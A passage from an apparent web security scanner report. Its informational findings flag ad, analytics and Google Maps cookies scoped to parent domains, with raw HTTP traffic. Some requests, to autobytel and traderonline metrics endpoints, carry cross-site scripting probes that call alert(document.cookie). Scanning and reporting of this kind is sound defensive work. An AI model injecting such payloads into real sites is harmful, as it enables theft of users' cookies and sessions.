User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxLtDK0qi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNlKxrAa8pD0k%253D; myPAL=eJxLtDK2qs60MrAutjIyt1IyNDGzVLa0tDRUNjQwUTYwM1AOATJ8gSJGStaZVoYgZWYgZeamUGXmBsoGBoZAZeYGMFVGcMPgqjANqwUAip0atg%253D%253D; BFF=eJxLtDKxqi62MjSwUgoxNDDxdbC0tDRSss60MjQxN7UGShhbKfn6%252B4V4%252BETGh3kGe4YoWSdameLSYmYJ1GIKFUcSQlFrjCRhCRI3N0C31QQiDBepxW4EWC1WI2oBnuw0eQ%253D%253D; TFF=eJyNj7ENgDAMBHdhgncIsew0GYM2RQokOugQu2MoKAKIFNa7uHvps4pui5LTjuATApKIuC5mdbpNStHO82CB6w0S9wdPJ99XvLPrK49vrc2whG%252FvLmOZ81q%252Buv3bCkYC6Ge1vU%252F%252BczVVHt9am2HJaCL3AyAZcuM%253D

Response

HTTP/1.1 200 OK
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJydkDEOwzAIRe%252BSEwC2g8FLjtHVQ4ZK3dotyt1LWjWRnKRFHRDIeg%252FxXRWTTndF0g4hDtDDICLUlaqk01WxWEVO1uA19lLmHY8LHxqerELj8ar5DOsQ%252FbvHy3irj7HZnT%252FGYQqGAQB%252FpLZxz5%252BmxsbjVfMZ1hmcu5ebKKazDHnLkN983HjKKbCc%252FRZ%252BMVEkMP1jBiDm5DV5FX2GvcXkIucn21jBjA%253D%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 24-Jan-2010 21:06:40 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJxLtDKyqs60MrIwNTa3tE60MgTxDKyLrQwtrJQMTSxM483jjUxM4w0MDOOBUMm6NtPK2MDI3NyUKMW1ALLGGNA%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
Date: Mon, 24 Jan 2011 21:06:41 GMT
Server: HTTP server
Content-Length: 975

document.write('<img src="http://ad.yieldmanager.com/pixel?id=285379&data=245001&id=716806&data=245001&id=199372&data=245001&id=302775&data=245001&id=716807&data=245001&t=2" width="1" height="1"></img
...[SNIP]...

13.114. https://maps-api-ssl.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=15465537720298b3:TM=1295908849:LM=1295908849:S=eCJvLriWDbsm79ao; expires=Wed, 23-Jan-2013 22:40:49 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

13.115. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=c21edb51d7356cca:TM=1295908855:LM=1295908856:S=PTt96tHXYS63KD3T; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:40:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c21edb51d7356cca:TM=1295908855:LM=1295908856:S=PTt96tHXYS63KD3T; expires=Wed, 23-Jan-2013 22:40:56 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html xmlns:v="urn:schemas-microsoft-com:vml" class=""><head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=EmulateI
...[SNIP]...

13.116. http://maps.google.com/maps/place

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...

13.117. http://media.fastclick.net/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/pg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 929
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

<html><body><img alt="." src="https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914" />

<img src="https://ad.yieldmanager.com/pixel?id=938566&t=2" width="1" height="1" />

<!-- Google
...[SNIP]...

13.118. http://media.fastclick.net/w/tre

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/tre

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
  • pluto=613465378701; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAAQ2HClNACAAAb1EIASgAAQOPQAAGeAKF0AAAYsO4AkvAA0gLwJJvzBgRwEYRUAlgAABlDOAB0AA4AUXAQAA; pluto=613465378701

Response

HTTP/1.1 302 Redirect
Date: Tue, 25 Jan 2011 01:35:47 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT
Set-Cookie: pluto=613465378701; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:47 GMT


13.119. http://media.fastclick.net/w/win.bid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/win.bid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
  • vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
  • adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
  • pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:37:24 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 883
Set-Cookie: pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
Set-Cookie: adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT

<a href="http://media.fastclick.net/w/click.here?cid=256698&mid=477674&m=1&sid=54816&c=0&tp=5&exid=3&asite=2061501907&vtid=14839&walsh=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBhN
...[SNIP]...

13.120. http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.autobytel.com
Path:   /b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; Expires=Sat, 23 Jan 2016 21:06:45 GMT; Domain=.autobytel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011?[AQB]&ndh=1&t=24/0/2011%2015%3A7%3A27%201%20360&pageName=unknown&g=http%3A//www.autobytel.com/x22&r=http%3A//burp/show/31&cc=USD&server=CWEB425&events=event10&products=%3B%3B%3B%3Bevent10%3D0&c1=Search%20Engine%20Optimization%20Project&v1=Search%20Engine%20Optimization%20Project&c2=SEO%20DTS%20-%20Google%20ABTL%2013148&v2=SEO%20DTS%20-%20Google%20ABTL%2013148&v3=NT-&v6=Search%20Engine%20Optimization%20Project%20%3A%20unknown&c10=%7C&c11=Search%20Engine%20Optimization%20Project%7C13148%7CABTL&c12=%7C%7C&c14=unknown%20%3A%20Search%20Engine%20Optimization%20Project%20entry%20page&c15=%7CNo%20Article&c20=%7C%7C%7C%7C%7C%7CSearch%20Engine%20Optimization%20Project&c21=Autobytel.com&c32=ads%20-%200&c34=Google%20Search%7Ef34b4--%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document.cookie%29%3Ef067754e5c4&c40=427D360F-AD19-8945-2CEDA65620083A33&c42=UpperFunnel&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: metrics.autobytel.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:06:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; Expires=Sat, 23 Jan 2016 21:06:45 GMT; Domain=.autobytel.com; Path=/
Location: http://metrics.autobytel.com/b/ss/autobytelcorp/1/H.5-pdv-2/s1332017967011?AQB=1&pccr=true&vidn=269EF4F28501182F-60000108600B027D&&ndh=1&t=24/0/2011%2015%3A7%3A27%201%20360&pageName=unknown&g=http%3A//www.autobytel.com/x22&r=http%3A//burp/show/31&cc=USD&server=CWEB425&events=event10&products=%3B%3B%3B%3Bevent10%3D0&c1=Search%20Engine%20Optimization%20Project&v1=Search%20Engine%20Optimization%20Project&c2=SEO%20DTS%20-%20Google%20ABTL%2013148&v2=SEO%20DTS%20-%20Google%20ABTL%2013148&v3=NT-&v6=Search%20Engine%20Optimization%20Project%20%3A%20unknown&c10=%7C&c11=Search%20Engine%20Optimization%20Project%7C13148%7CABTL&c12=%7C%7C&c14=unknown%20%3A%20Search%20Engine%20Optimization%20Project%20entry%20page&c15=%7CNo%20Article&c20=%7C%7C%7C%7C%7C%7CSearch%20Engine%20Optimization%20Project&c21=Autobytel.com&c32=ads%20-%200&c34=Google%20Search%7Ef34b4--%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document.cookie%29%3Ef067754e5c4&c40=427D360F-AD19-8945-2CEDA65620083A33&c42=UpperFunnel&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 23 Jan 2011 21:06:45 GMT
Last-Modified: Tue, 25 Jan 2011 21:06:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www67
Content-Length: 0
Content-Type: text/plain


13.121. http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.traderonline.com
Path:   /b/ss/detraderonline/1/H.17/s93964351669419

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; Expires=Sat, 23 Jan 2016 15:58:35 GMT; Domain=.traderonline.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/detraderonline/1/H.17/s93964351669419?AQB=1&ndh=1&t=24/0/2011%209%3A59%3A11%201%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.traderonline.com/x22ec89d%253Cscript%253Ealert%28document.cookie%29%253C/script%253E93a08fbf703&r=http%3A//burp/show/5&cc=USD&pageType=errorPage&events=event1&c1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&v1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&c4=Data%20Not%20Available&v4=Data%20Not%20Available&c7=New&v7=New&c8=First%20Visit&v8=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=950&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8009oaoAAx1V; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B; s_pers=%20s_nr%3D1295884751287%7C1298476751287%3B%20s_lv%3D1295884751289%7C1390492751289%3B%20s_lv_s%3DFirst%2520Visit%7C1295886551289%3B

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 15:58:35 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; Expires=Sat, 23 Jan 2016 15:58:35 GMT; Domain=.traderonline.com; Path=/
Location: http://metrics.traderonline.com/b/ss/detraderonline/1/H.17/s93964351669419?AQB=1&pccr=true&vidn=269ED0D58501209E-6000010F000341E3&&ndh=1&t=24/0/2011%209%3A59%3A11%201%20360&ce=ISO-8859-1&ns=dominionenterprises&g=http%3A//www.traderonline.com/x22ec89d%253Cscript%253Ealert%28document.cookie%29%253C/script%253E93a08fbf703&r=http%3A//burp/show/5&cc=USD&pageType=errorPage&events=event1&c1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&v1=Information%20fourofour%20TraderOnline.com%2C%20Trader%20Magazines%2C%20and%20TraderOnline%20family%20sites.%20%u2013%20TraderOnline.com&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&c4=Data%20Not%20Available&v4=Data%20Not%20Available&c7=New&v7=New&c8=First%20Visit&v8=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=950&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Sun, 23 Jan 2011 15:58:35 GMT
Last-Modified: Tue, 25 Jan 2011 15:58:35 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www120
Content-Length: 0
Content-Type: text/plain


13.122. http://mig.nexac.com/2/B3DM/DLX/1@x96

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1391
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

if((cookie_check(
...[SNIP]...

13.123. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • RMFL=011PhXoxU10EfJ|U10Eo1|U10166E; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
  • NXCLICK2=011PhXoxNX_TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure!y!B3!166E!1MSss; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3 HTTP/1.1
Host: network.realmedia.com
